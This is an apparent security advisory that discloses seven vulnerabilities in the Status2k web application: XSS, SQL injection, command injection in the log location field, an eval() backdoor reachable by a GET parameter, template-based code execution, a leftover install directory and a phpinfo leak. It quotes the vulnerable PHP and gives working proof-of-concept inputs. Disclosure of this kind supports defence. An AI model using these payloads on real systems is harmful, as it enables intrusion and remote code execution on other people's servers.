Status2k XSS / SQL Injection / Command Execution

2014.08.03
Credit: Shayan Sadigh
Risk: High
Local: No
Remote: Yes

# Exploit Title: Status2k Multiple Vulnerabilities/0days # Date: 6/20/2014 # Exploit Author: Shayan Sadigh (twitter.com/r1pplex) | <ienjoy.ripples@gmail.com # Vendor Homepage: http://status2k.com/ # Version: All # Tested on: Linux/Windows # CVE : CVE-2014-5088, CVE-2014-5089, CVE-2014-5090, CVE-2014-5091, CVE-2014-5092, CVE-2014-5093, CVE-2014-5094 1. Cross site scripting/XSS... there's tons, example admin login page, etc login.php: if (isset($_GET['username'])) { $useren = $_GET['username']; } if (isset($_POST['password'])) { $useren = $_POST['username']; } $q = mysql_query("SELECT * FROM ".$prefix."users"); $adminuser = $res['adminuser']; // Login Database $cusername = $_COOKIE["S2KUser"]; if ( ($cusername == $adminuser) && ($cpassword == $adminpass) ) { $lgtrue = 1; } if ( ($useren == $adminuser) && ($passen == $adminpass) ) { setcookie("S2KUser", $useren); if ($passen && $useren) { if ($useren !== $adminuser) { echo '<div class="alert-message error" Username ('.$useren.') Incorrect.</div'; } <input type="text" name="username" size="25" simple injection can be done in the username field, <scriptalert("poc")</script, etc Use CVE-2014-5088 for all of the XSS issues. 2. SQLi vulnerability in the GET (log) param... This isn't too useful seeing that if you had auth, much more damage could be done - refer to command injection lack of sanitization: in /admin/options/logs.php $l = $_GET['log']; $q = mysql_query("SELECT * FROM ".$prefix."users"); $query = mysql_query("SELECT * FROM ".$prefix."logs WHERE id = '".$l."'"); $result = mysql_fetch_array($query) or die(mysql_error()); $query = mysql_query("SELECT * FROM ".$prefix."logs WHERE id = '".$l."'"); $result = mysql_fetch_array($query) or die(mysql_error()); $query = mysql_query("SELECT * FROM ".$prefix."logs WHERE id = '".$l."'"); $result = mysql_fetch_array($query) or die(mysql_error()); - PoC: site.com/s2kdir/admin/options/logs.php?log=[sqli] Use CVE-2014-5089. 3. Command injection This requires access to the Status2k Admin Panel, log-in and proceed to click the 'Logs' tab, then select 'Add Logs', type in any name and for the 'Location' field use command injection... Then browse to the created log via the 'Logs' tab again. - example: Logs --Add Logs --; then Logs --newly created log Name: test Location: /var/log/dmesg;pwd; uname -a localhost/admin/options/addlog.php?type=edit&id=5 so there's no sanitization in addlog.php which lets you put anything you want as a log location... the issue now is that in logs.php: $logc = cmdrun($config['logcmd'].$result['location']); $log = explode("\n", $logc); $log = array_reverse($log); cmdrun literally calls the equivalent of exec() and thus completely execution of a command. if it is complaining about dmesg... try other log locations... such as /usr/local/apache/logs/suexec_log, also try other bash chars, such as | & && ; $(), etc Use CVE-2014-5090. 4. eval() [RCE] backdoor.. For about a year, status2k.com was hosting a backdoored version of their software... either they knew it or not, there was never an announcement when the backdoor was found (good job). in the file /includes/functions.php: eval($_GET['multies']); site.com/s2k/includes/functions.php?multies=inject_php_code here PoC: site.com/s2k/includes/functions.php?multies=echo 'foobar'; Use CVE-2014-5091. 5. Another RCE status2k also lacks sanitization in the templates; /admin/options/editpl.php one can literally place any malicious php code they want here and have it execute // Let's make sure the file exists and is writable first. if (is_writable("../../templates/".$config['templaten']."/".$filename)) { // In our example we're opening $filename in append mode. // The file pointer is at the bottom of the file hence // that's where $somecontent will go when we fwrite() it. if (!$handle = fopen("../../templates/".$config['templaten']."/".$filename, 'w')) { echo "Cannot open file (../../templates/".$config['templaten']."/".$filename.")"; exit; } // Write $somecontent to our opened file. if (fwrite($handle, $value) === FALSE) { echo "Cannot write to file (../../templates/".$config['templaten']."/".$filename.")"; exit; } else { echo "Success, $filename updated!"; once again complete lack of sanitization. Use CVE-2014-5092. 6. Design flaw by default Status2k does not remove the install directory (/install/), this may lead to an attacker resetting the admin credentials and thus logging in and causing further damage through RCE vectors listed above. Use CVE-2014-5093. 7. Information leak... it is not shown by default on the index.php of status2k above version 2, however // PHPINFO ========== // ================== $action = $_GET["action"]; if ($action == "phpinfo") { phpinfo(); die(); } allows anyone to view the server's phpinfo page (localhost/status/index.php?action=phpinfo) Use CVE-2014-5094.


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